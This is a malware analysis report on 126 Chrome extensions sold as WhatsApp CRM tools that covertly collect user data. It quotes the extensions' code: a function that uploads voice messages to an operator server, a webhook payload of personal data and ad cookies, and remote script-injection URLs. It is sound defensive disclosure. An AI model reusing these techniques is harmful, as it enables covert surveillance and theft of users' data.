MalExt Sentry ← Report Library
2026-05-13 data-exfiltration remote-code-execution cookie-theft voice-interception

WaSteal: 126-Extension WhatsApp Data Collection Network (wascript.com.br)

Indicators of Compromise

FieldValue
Platformwascript.com.br (Brazil), internal name "watidy"
Network size126 live Chrome extensions (150 IDs registered in platform code)
Total installs~148,000 confirmed across all variants
Largest variantillemhbijpiebjfilfmgebahaakajkpe (WaSeller) - 100,000 installs (67.6% of network)
Version analyzed7.4.3.38
Last updated (all 126)2026-05-12 (simultaneous push across entire network)
Shared platform cript_keyffce211a-7b07-4d91-ba5d-c40bb4034a83
Backend C2backend-plugin.wascript.com.br, backend-utils.wascript.com.br, painel.wascript.com.br
Audio exfiltration endpointhttps://backend-utils.wascript.com.br/api/audio/convert-ptt-base64
Remote code originhttps://extractleads.com.br/teste/header.js, body.js, footer.js
Obfuscated throttle key8fd5ad24df1e1b800d670e563b1b83591980060a== (localStorage)
Live GTM container (WaSeller)GTM-KMZ9CZK (hardcoded in WaSeller pixel config - persistent remote code channel)
Sample variantsillemhbijpiebjfilfmgebahaakajkpe (WaSeller), gjlfpggiddcminhebiejofeglfjmleli (waTidy), eolijkhfnnodhepiglajhkijjbcndiea (FR VENDAS PRO), jeicljefnlpdoblklfdephbpihhjgphf (ENOCRM)

wascript.com.br operates a white-label platform (internal name "watidy") distributed across 126 Chrome extensions that collectively present themselves as independent WhatsApp CRM tools for Brazilian small businesses. Every extension in the network shares a single codebase, a single backend infrastructure, and a single behavior: silently routing voice messages through wascript.com.br servers, exfiltrating advertising tracking cookies and user PII to operator-controlled webhooks, and injecting a full WhatsApp internal API bridge into the browser. The largest variant, WaSeller (illemhbijpiebjfilfmgebahaakajkpe), holds 100,000 of the network's 148,000 confirmed installs and additionally embeds a live Google Tag Manager container (GTM-KMZ9CZK) giving its operator a permanent, unauditable remote code execution channel. None of the undisclosed behaviors are disclosed to end users across any variant.

Methodology

Findings are based on static analysis of extension bundles obtained from the Chrome Web Store. The 126-extension network was surfaced using internal tooling that clusters Chrome Web Store listings by shared code fingerprints, backend infrastructure, and behavioral signatures across manifests, content scripts, and injected page-context bundles. Each variant was individually verified to share platform key ffce211a-7b07-4d91-ba5d-c40bb4034a83, the wascript.com.br backend endpoints, and the behaviors documented below.

No requests were made to wascript.com.br infrastructure beyond what the installed extensions initiated during normal operation on researcher-controlled WhatsApp Web sessions. All findings are reproducible from the published bundles. SHA-256 hashes of analyzed files are listed in the appendix.

Bundle structure

The extension is a Vite/Rollup ESM bundle with approximately 235 chunk modules, plus a 601 KB injected IIFE (whatsapp/index.iife.js) that runs in WhatsApp Web's page context:

  1. CRM UI modules - contacts, scheduled messages, quick replies, funnels (legitimate)
  2. Automation engine - message dispatch, follow-up timing, chatbot flows (legitimate)
  3. background.js - install beacon, periodic polling of remote DOM selectors, alarm scheduler
  4. whatsapp/index.iife.js - page-context WhatsApp API bridge (the primary attack surface)
  5. Webhook event dispatchers - chunk65.js, chunk108.js, chunk21.js (the exfiltration layer)
  6. White-label registry - chunk4.js embeds all 150 extension IDs and their per-reseller pixel/webhook configs, including WaSeller's live GTM container ID

Advertised functionality

The extension legitimately provides WhatsApp Web CRM features: tagging contacts, scheduling messages, storing quick-reply templates, running multi-step automation flows, and a basic sales pipeline. These features require injecting into https://web.whatsapp.com/* and reading contact and chat metadata. The manifest declares only tabs, storage, alarms, and unlimitedStorage permissions - no microphone, no clipboardRead, no broad host permissions beyond WhatsApp.

Undisclosed behavior: PII and advertising cookie exfiltration

Once every 24 hours, on login to WhatsApp Web, the extension silently POSTs the following bundle to WaSeller's operator-controlled webhook URL:


{
  "user_id": "...",
  "name": "...",
  "email": "...",
  "email_auth": "...",
  "whatsapp_plugin": "<device fingerprint>",
  "navigator": "<user agent>",
  "whatsapp_registro": "<phone registration>",
  "campanhaID": "...",
  "cookies": {
    "_fbc":    "<Facebook click ID>",
    "_fbp":    "<Facebook browser fingerprint>",
    "_ga":     "<Google Analytics client ID>",
    "_ttclid": "<TikTok click ID>",
    "_ttp":    "<TikTok browser fingerprint>"
  }
}
  1. On WhatsApp Web load, the content script reads the user's stored profile (name, email, device ID) and calls Conn("getMyDeviceId") via the injected WhatsApp API bridge to obtain the hardware fingerprint.
  2. It reads _fbc, _fbp, _ga, _ttclid, and _ttp from browser storage - cross-site advertising identifiers set by Facebook, Google, and TikTok pixels on other websites the user has visited.
  3. It checks localStorage.getItem("8fd5ad24df1e1b800d670e563b1b83591980060a==") - an obfuscated key - to determine if 24 hours have passed since the last send. The key name serves no functional purpose; its only effect is to make the throttle invisible to casual inspection.
  4. If the throttle clears, it POSTs the full bundle to the reseller's webhook URL, which can be any arbitrary endpoint on the internet.

The cookies field is structurally parallel to the StealTok pattern: advertising identifiers set by third-party sites are silently harvested and forwarded without user knowledge or consent. Recipients can use _fbp/_ttp to link the user's real identity (name, email, phone) to their cross-web browsing history, or build Custom Audiences on Meta/TikTok without a legitimate customer relationship.

Undisclosed behavior: live GTM container as permanent remote code execution

WaSeller's pixel configuration in chunk4.js contains a real, live Google Tag Manager container ID:


google_tag_manager: "GTM-KMZ9CZK"

This is not a placeholder. GTM-KMZ9CZK is an active container. When the extension panel loads, this GTM container is injected into the page. From that point forward:

  1. The WaSeller operator can push any additional JavaScript to all active WaSeller users from the GTM dashboard - with no extension update, no Chrome Web Store submission, no review, and no user notification - ever.
  2. GTM scripts execute with the same privileges as the extension panel page, which runs in the context of an authenticated session.
  3. This channel persists as long as the extension is installed. There is no mechanism for the user to audit what GTM has pushed.

This is structurally identical to the "update URL" remote code execution vector documented in the StealTok campaign (LayerX Security, 2024), but implemented through a legitimate, widely trusted advertising infrastructure tool rather than a raw HTTP fetch - making it harder to detect and block.

Other white-label variants in the network use placeholder GTM IDs; WaSeller's use of a real container confirms that this channel is actively operational for the highest-user extension in the network.

Undisclosed behavior: voice message interception

Every audio message sent through the extension is intercepted before delivery to WhatsApp:


const S = async (base64Audio) => {
  if (base64Audio.startsWith("data:audio/ogg;codecs=opus")) return base64Audio;
  const { data } = await axios.post(
    "https://backend-utils.wascript.com.br/api/audio/convert-ptt-base64",
    { base64: base64Audio }
  );
  return data.base64;
};

The full base64-encoded audio is transmitted to wascript.com.br servers before it reaches the intended recipient. The stated purpose is format conversion, but the effect is that every voice note passes through a third-party server. Under GDPR Article 9, voice data may qualify as biometric data (special category), requiring explicit consent - none is obtained or disclosed.

Undisclosed behavior: runtime arbitrary code execution from extractleads.com.br

White-label variants in the network - including those sharing WaSeller's platform codebase - configure external JavaScript URLs in the script_head, script_body, and script_footer fields of their panel pixel configuration:


https://extractleads.com.br/teste/header.js
https://extractleads.com.br/teste/body.js
https://extractleads.com.br/teste/footer.js
https://static-files.watidy.com.br/header.js
https://static-files.watidy.com.br/body.js

extractleads.com.br is a Brazilian lead-generation company with no disclosed relationship to wascript.com.br. These scripts are fetched and injected at runtime into the extension's panel pages. Their content is not in the extension package, is not reviewed by Chrome Web Store, and can be changed server-side at any time.

The retrieved content of header.js confirms the mechanism: it is a server-side template that substitutes per-reseller pixel IDs at request time and then:

  1. Injects a Facebook Pixel (fbq init + PageView) - firing a conversion event correlated with the _fbc/_fbp identifiers already harvested from the user's browser, completing the attribution loop without user awareness.
  2. Loads Google Ads (gtag) and Google Tag Manager into the extension panel page - layering a second GTM injection path on top of WaSeller's already-active GTM-KMZ9CZK container.
  3. Appends a customization hook ("Adicione conteudo personalizado") confirming the file is designed to be extended with arbitrary additional behavior per deployment.

Undisclosed behavior: WhatsApp internal API bridge

whatsapp/index.iife.js (601 KB) is injected as a &lt;script&gt; tag into the WhatsApp Web page context - bypassing the content script sandbox. It exposes the following WhatsApp internal module APIs via a postMessage bridge:


BlockList, Chat, Group, Conn, Contact, Functions, Labels,
ListChat, Msg, MultiAtendimento, Profile, Status, Utils,
Webpack, DomSelector, IA, Whatsapp

This gives the extension programmatic read/write access to the user's full contact list, all chat conversations, and message history. The Msg module allows sending messages on behalf of the user. Three calls to analytics.google.com/g/collect are present inside the IIFE, meaning Google Analytics telemetry fires from within WhatsApp's domain - constituting cross-site tracking against WhatsApp's own users.

Why the consent framing does not matter

There is no consent gate visible to the end user. Users install WaSeller as what appears to be an independent CRM product. The underlying platform (wascript.com.br) is not disclosed anywhere in the user-facing product. There is no privacy policy link on the Chrome Web Store listing.

Even if a user accepted a generic ToS, it would not cover:

The obfuscated localStorage throttle key (8fd5ad24df1e1b800d670e563b1b83591980060a==) demonstrates awareness that the exfiltration behavior should not be easily discoverable. The remote DOM selector fetch (every 10 minutes from painel.wascript.com.br) means the extension's page-access behavior can change after installation with no store update and no user notification - so even initial-install consent would not cover future behavior.

Infrastructure

DomainRoleDisclosed?
backend-plugin.wascript.com.brAuth, install/uninstall telemetry, license checksNo
backend-utils.wascript.com.brAudio message interception and format conversionNo
painel.wascript.com.brRemote DOM selector delivery (runtime behavior control)No
audio-transcriber.wascript.com.brVoice transcription (receives full audio content)No
multi-atendimento.wascript.com.brWebSocket - real-time multi-agent relay channelNo
api-whatsapp.wascript.com.brWebSocket - WhatsApp event relayNo
app.wascript.com.br / dev.watools.com.brPanel login origin (externally_connectable)No
static-files.watidy.com.brRuntime external JS injectionNo
extractleads.com.brRuntime external JS injection (third-party lead gen)No
GTM-KMZ9CZK (Google Tag Manager)Permanent remote code execution channel for WaSellerNo
cobrancas.uppermesh.com.brBilling/payments (separate company)No
wajsapi.titanchat.com.brAlternative WhatsApp API relay (separate company)No
wppc-linkpreview.cloudtrix.com.brLink preview proxy (separate company)No
analytics.google.comGA telemetry fired from inside WhatsApp Web tabNo
Reseller webhook URLsReceives full PII + advertising cookie bundlesNo

All 126 live extensions (150 IDs registered in platform code) share one cript_key (ffce211a-7b07-4d91-ba5d-c40bb4034a83) and one backend infrastructure. WaSeller (sigeID 11) is among the earliest registered variants and holds 100,000 of the network's 148,000 confirmed installs. FR VENDAS PRO (eolijkhfnnodhepiglajhkijjbcndiea) and ENOCRM (jeicljefnlpdoblklfdephbpihhjgphf) are among the other 124 variants running the same codebase.

Known extensions in the network

Data as of 2026-05-13. All 126 extensions were updated 2026-05-12. Publisher handles are Chrome Web Store developer account identifiers.

Extension IDNamePublisherInstallsFirst PublishedLast Updated
illemhbijpiebjfilfmgebahaakajkpeWaSeller - Perder vendas no WhatsApp nao e normalwsll100,0002023-06-012026-05-12
gjlfpggiddcminhebiejofeglfjmleliwaTidy : CRM no whatsapp, Automacoes e Ferramentas para vendawsll20,0002022-03-162026-05-12
gjbfdbkfhgdfiieppgdpbglhjhljhhmkWhaScale - Um passo a frente do seu concorrentewty10,0002024-01-042026-05-12
ghajfmiecdhdkifpapbjngmcdbedjmggWaBestwty1,0002024-03-132026-05-12
ajihoihfamedkfcknpgcelpbhdnadabgPROSPECTA CRMwspd1,0002024-07-082026-05-12
gkdefmghclmhookpgciggdhglejpghocWhapro - Automacao, CRM e Vendas no WhatsApp Webwspd1,0002024-10-052026-05-12
jkeogjcccehfccanacclmckcdgepkifoInterZapwty1,0002023-12-312026-05-12
gjdchlihfacnabnppldhmnimolipgnmjSutoflyCRM, WhatsApp Web organizado, automatizado e vendendowsll9352024-09-242026-05-12
npfamfonpecnjjbhalhdahlokadlblbmChatweb CRM : Transforme seu whatsapp em um sistema de vendasewdht8702024-10-282026-05-12
elahghcenkbboillglflockiijbkejodHchatwty8462024-01-272026-05-12
mleloepbohmmgjcfacngpffcappdcdniVMSendermkt.solucoes5952022-06-232026-05-13
njpegidkheieeecaiaaihggmnhklccjnDragonChatwspd5402024-08-242026-05-12
jhokpeoaapahcoaigkfnienliabeaangDisparo/Wa - Disparo no WhatsApp, CRM, Automacoes, Ferramentas para Vendaewdht5262024-11-302026-05-12
pdlpnkplaofpdajmgegfnlifmdlejmfpNextgo Zap: Seu Whatsapp Turbinado!Intzp5072025-01-222026-05-12
jadgponjpllhepidoclncpogkhcnepacWaPROdywsll4962023-10-192026-05-12
dfcngbjlmlakepppfaaepideejcbfcjfWA Enviowty4822023-12-212026-05-12
foodgdffkpakghokjoemdblocpijcdgdTo Talk Connectwsll4792023-05-242026-05-12
afdhcpnimkgccfjcelgkiipidhebddjhG5 Chatwspd4722024-06-232026-05-12
oghollmlfgpfdlailojlcpbbmjoeabheMARKETING DE FITNESSwty4402024-03-062026-05-12
jcjodbceolndbhnbljiedcanmglmhmopZarpGoewdht2982024-11-142026-05-12
cbgghdpadjdmlelmkkonkcjiccajaolnIA do CorretorStfl2692025-03-212026-05-12
gnmmfdohfcohcflccikmlodaeignlkceWhats Expertewdht2612024-11-152026-05-12
gkkkdobapmhkaihggejlcdbjemfkhdgkZappyGOwspd2582024-09-122026-05-12
nlbdmcikemaghcoeoblmlkdlhiggnhinCRM DE ELITE : CRM no whatsapp, Automacoes e Ferramentas para vendaewdht2252024-10-182026-05-12
kknnggmipdieldidejjflfceicjpcgdkOrganize-C Prowhscl2132025-12-212026-05-12
ahgellbcclklfinhliakcdgjnebickelWhat Visionwhscl2112025-09-132026-05-12
fefgeijhenfppagifhlfkjjadijghoeaWin7max - CRM no WhatsApp Web, Chatbot, Automacao e Disparo em Massaewdht2062024-10-172026-05-12
echacghfmpmedednbkfoalmpccdiajciCRMSIMwty1992024-05-072026-05-12
moodoffpaogeijclgpdicfnidnmeeeoeViaShopModawsll1962024-06-132026-05-12
ffngpoeegbhbhpbkhbnilghielofekpcApp Vendas CRMStfl1922025-06-102026-05-12
ngnffiapbonmlgijfnlcgbdomhgcmmnaBotzom - Vendas, CRM e Chatbot para WhatsAppwhscl1882025-08-252026-05-12
cellckcnenolgakggljkichbmgmbibgbMidia Medica Orientadawsll1612023-07-132026-05-12
jacgfjfdnjamjbdkihblimkekfoiiafiWAFACILwty1502024-04-062026-05-12
elicjcmfamohcfkpokcdhapngkadckpaChat Boostwsll1432023-08-142026-05-12
npeoblgjndfpphhdjlanbjalbccifpomMais Leads CRMwspd1202024-09-212026-05-12
ijdgdpgjggoehifckpmpdmfpnkdakkneVerk - Direto no whatsapp, Automacoes e IA para vendasIntzp1192024-12-122026-05-12
ojpoinccmndjnfhhkgcbjmkfahfmppeeZAPGYNIntzp1142024-12-132026-05-12
bhdaecfcjmipomgngjhacbfmjafjniclSmart WAwspd1132024-07-032026-05-12
pmkbdfddjmnceffcgdgfnenkngkkehegWhatsTime CRM for WhatsApp Webwty1082024-05-022026-05-12
bledopcgjbhnheppjbekbjnjnelmckdlWa Elo IAIntzp962025-01-222026-05-12
gmidblfofjdiajmlnfiagijikmojkhiaSevenSalesIntzp962025-02-222026-05-12
dagelhckpadaagjpebgjfkccfnljcjmnPangeiaewdht902024-12-072026-05-12
ahiieliljkcgmghicbgidblclkbklmkaDental Chat - Gestao de leads e pacientes no Whatsapp para Clinicaswspd882024-08-032026-05-12
pdckbaohagnmbkfjgobeaiiplolfckhmwa To youwsll852023-10-072026-05-12
abpcbpoghgmfjkkdoeknbldhkklpcmfnEddyewty832023-12-252026-05-12
pcpdnigabekdogbajcacpbkebdfmaapcELITEwty802024-03-162026-05-12
lfenojckeamfnllggndghkmfhkheiimcUpSellewdht802024-11-282026-05-12
lecapbnkojjbcmpgojanclnilcnemjpkSmartZapIntzp782024-12-212026-05-12
okhjgjpafhnjbndkojddaicngefobnjnFeel UpStfl722025-03-212026-05-12
olmbfmmlpodikepicechoekmiiejpmelWA BOOSTERwsll712023-11-092026-05-12
kmipafdabbpmampkcconideakdacmalnBootCompwsll702023-05-242026-05-12
hcbmcbkjjklkjidikpggmmfpfklcpnmbZAPPROFIT CRMwhscl672025-11-062026-05-12
dpahdbhekfclimkekdabboefohagelfpCliente Flowewdht642024-12-042026-05-12
aocojboaoklgedadlpaallelnanhcpgmYOUSELLER - Facilidade, produtividade em escala.Intzp632026-03-202026-05-12
ghfhbalboihigmncnabikapdldfdikngFATURE MAISewdht622024-10-172026-05-12
mahgiheajijdifhnekeknnkfkjbfjkdhAcelere CRMwhscl582025-07-162026-05-12
acncpfocelnijeegfclfigffjgancfodWhatSellerwsll572023-04-302026-05-12
hknmlgmbiononigjnihhflhmmmhfbjplautozai - Otimize o tempo e multiplique as vendas no WhatsAppStfl572025-05-152026-05-12
ligmikomohkaooecoochfknopalblanlBull Lead - Automacoes e atendimento no WhatsApp para vendedoreswspd552024-09-262026-05-12
endfahndaiibchcbfaphnhanpckdhmllWaMedIntzp522025-01-032026-05-12
engjehngfignjpekjkpgjgapnlkndofkSmartFlowwsll502023-09-112026-05-12
pldfelebkfalpldhfbeagfgmmmelajlcZapbaseewdht482024-12-102026-05-12
bgnkgembgfkfjipflkniiibgcedloeknMULTIZAP CRMwhscl472025-12-212026-05-12
iibldfhmeiipohbjlkhfgnjhcmkknffiAtendaZapIntzp472025-02-192026-05-12
pgnmegacljodjeioihhjlcajngphbagfEnZapwty462024-03-062026-05-12
npcbkljcefmdegcjjghdfgfmnkmfjlbaLEEVO CRMwhscl462025-07-312026-05-12
pdfegaocpmmmomhgodfipbfmbikdajfjWaPowerwty442024-03-132026-05-12
deaadbmkldfnondhdbbfoldamngpgahpCRM TURBINADOStfl412025-03-282026-05-12
eolijkhfnnodhepiglajhkijjbcndieaFR VENDAS PROStfl402025-06-162026-05-12
gollbfedpcfodjgfjddbkfnkkfdedknnMaster EngageIntzp392024-12-152026-05-12
bijckmbmblabepobmabjcegimlcpilmlDR.FIDELIZAStfl392025-03-122026-05-12
ephepidhbiabcalednafkdpllnnohnphDGUESTSwspd382024-06-192026-05-12
ekmdldnjhmffdbihkfannnmloccnmemnTalk Maiswsll382023-07-072026-05-12
nenopmledlfnfcgjdkdefhegeajjpfgfAmizAppIntzp362025-01-032026-05-12
dfeojjampcncbhemefhadnnokdjdfomdEAI +whscl362025-08-152026-05-12
cicmfpphdicmiaphcmjpcapphlnooglpFocusLeadewdht342024-12-052026-05-12
bdcoljfgfbdkmjeabhnpgddpiopccleoWhatsSellingwhscl342025-09-112026-05-12
pckoggnahgjephjpcmfnhfolbmenkdjpSellUPIntzp342025-02-112026-05-12
nddkllhdjjgopaibekmobibbmoedkdmjVluwwhscl332025-09-212026-05-12
ejenghcfiaehahmeklcojkhpamicfjolJURIMIND CRMStfl332025-06-162026-05-12
dhpgneegbflgangnpfeoafgpabacholjWaListall - O Melhor CRM para WhatsApp Webewdht312024-12-102026-05-12
imgjapefioodjkjipgpnohmceghomkmbWaClinicwty292024-05-162026-05-12
kmmibpooeblhmpbphojdncfdlfflecabWaContactIntzp272025-02-112026-05-12
emhembimlgjkalegifeijlilginlnanoClickZapewdht262024-10-282026-05-12
okiccdcmkdhldgbclikganfldepocmmdNinja Adsewdht242024-10-302026-05-12
cbfeaklofemfhdlajmnlbdadcmbfaakcGera Cliente - Extensao do Whatsapp para vender ate 4x maisIntzp232026-03-202026-05-12
comknamophhecgmcchgcclmcodohlfapSPEEDYXwty222024-03-212026-05-12
mkjmckhlecedggnpbefkgehebkickghdZAPARETOwhscl212025-07-312026-05-12
mpmccehgdjojicnlcmmdoogohdamlfppDigitaZapwspd202024-08-282026-05-12
aajdkangkldmljmoaoehmbnchdjkgojkWAMEIntzp192025-01-182026-05-12
jeicljefnlpdoblklfdephbpihhjgphfENOCRM - Gestao de Leads no WhatsAPPwspd192024-09-172026-05-12
pcjidgpofjkoaelajgfdecebigjiojcnWATHORIntzp182025-02-142026-05-12
nfhbefcgpghdaaebjafocolpadkdedefWAPINwty182024-06-022026-05-12
jkflhidejcmhenikpjhidoofogahicjpRED Chat CRMStfl162026-03-172026-05-12
cbaabfpflhiklcjgkjjhfjelihkgondnWActionIntzp162025-01-032026-05-12
jkblcpmoooocmdcfjojdecccejlkicapMERLIN BOTIntzp162026-03-202026-05-12
aehakeblnhhdddmglmolkjcdjblghjbmAgencia Guedeswhscl152026-01-102026-05-12
pihbjpjjgpejkbjmpijpmmolaehlbafctalkspeedwspd142024-08-102026-05-12
hkdbocoaofpdmbbgpimdkhcafenpkiknWATENDwhscl142025-08-162026-05-12
beeemlkkaejmncamaeeahkbibhapgpegGestor B2BStfl142025-05-012026-05-12
cfbgbmdpdkmdpdpchmhpkkdcolpgnodeMonitora Leadswspd142024-07-282026-05-12
jaonmiiccahaddjkdhaonhfhdiagfbdhWaat: CRM e Vendas no WhatsApp Webewdht122024-10-182026-05-12
okmklmkaficfbcebbggmjmphhipflhmeIronZapewdht112024-11-242026-05-12
abkolnpebgghiglkkdjcgjgbpnddmfmpWAVENDYIntzp112026-03-202026-05-12
bjhbgbfapjofmjcoonncefneakppmkmoPRAXATECH SOLUCOESwspd112024-07-312026-05-12
bkkcobflaheefjdhejdbogmhpojphhhfUATZAP CRMStfl102025-07-022026-05-12
bgaaamckjapoiaiioklgmbknjegdkkhdCRM-PRO : Transforme seu whatsapp em um sistema de vendasamhgforres92026-05-042026-05-13
fhgjdkfbeghkbgjjkkkldiemdcboimmiPrimeira ClasseIntzp92024-12-142026-05-12
hecbfkaeblempihjgpoeapkpjnkhlmliwazippyStfl82025-04-162026-05-12
aidmcapfnmaopagoclmgncjeegknibpdKASAPPwhscl82026-02-022026-05-12
pppeaodmafhlepccbpnjhobmokplfkjbYouZapCRM - WhatsApp Web com poder de CRM, automacoes e muito mais!Stfl82025-04-162026-05-12
ldhkdnjdpdknckckaoafnaipmclhnfbfSalezapwspd72024-09-122026-05-12
bpgbjcgkegcecddlnlckjcoddhpmekdhwaSuperewdht72024-11-042026-05-12
kiobbadnbgllphgkigmkahaimkmamflnVUTTI CRMStfl72025-07-022026-05-12
flfjappofhfkljghalmpfnnhllokpamiWORKZAPStfl62025-04-062026-05-12
bddkejibhlhebhfpbhjbgfnpkmgoboajZAZMAXwhscl62025-09-052026-05-12
adjmmdjciklooaidchgnmbdjmmgobcnczapboostIntzp52024-12-182026-05-12
gadlhgaecbhahkiojnnfnkklomflhifhWAURAwsll42026-02-022026-05-12
bbbifilhkmefbakdfjnamkneldmocibpMI CIERROIntzp32026-04-022026-05-12
deglljpibacfneponmjilaopemcdohleZAPFY CRMStfl32025-03-032026-05-12
cplaeebopfpnoebkaimlibpdickcjofaBALTZ CRMwhscl32025-11-132026-05-12
ikliliinakofoiojghnipegfphmoljlaKentroIntzp12026-03-202026-05-12
ckfolfphmhnhimichgialimbohkfkmppKFarias Inovacao TecnologicaIntzp12026-04-022026-05-12
plahbdekkijmgefopapakkhcogooghlkJJCAIntzp-2026-03-202026-05-12
fnhnkcmbkibeacgbhloapcdgmgfdnpccWATSELYIntzp-2026-03-242026-05-12
logefefpibkofniajhdigjnpbmimjelgKENVIA - Transforme o seu WhatsApp Web numa plataforma de vendasIntzp-2026-04-022026-05-12

Summary

WaSeller is the highest-user extension in a 126-listing white-label network operated by wascript.com.br (Brazil) that collectively impersonates independent WhatsApp CRM products while running a shared data collection infrastructure. Every user's WhatsApp Web login silently forwards a PII bundle - including real name, email, WhatsApp device fingerprint, and cross-site advertising tracking cookies from Facebook, Google, and TikTok - to the reseller's webhook, with no disclosure and no consent mechanism. Voice messages are routed through wascript.com.br servers before delivery. WaSeller specifically embeds a live Google Tag Manager container (GTM-KMZ9CZK) that gives its operator a permanent, unauditable remote code execution channel into the browsers of its entire user base - without any extension update or Chrome Web Store review - making it the most operationally dangerous variant in the network.


Research by Jean-Marie R. (Toborrm9) | Malicious Extension Sentry Project | May 13, 2026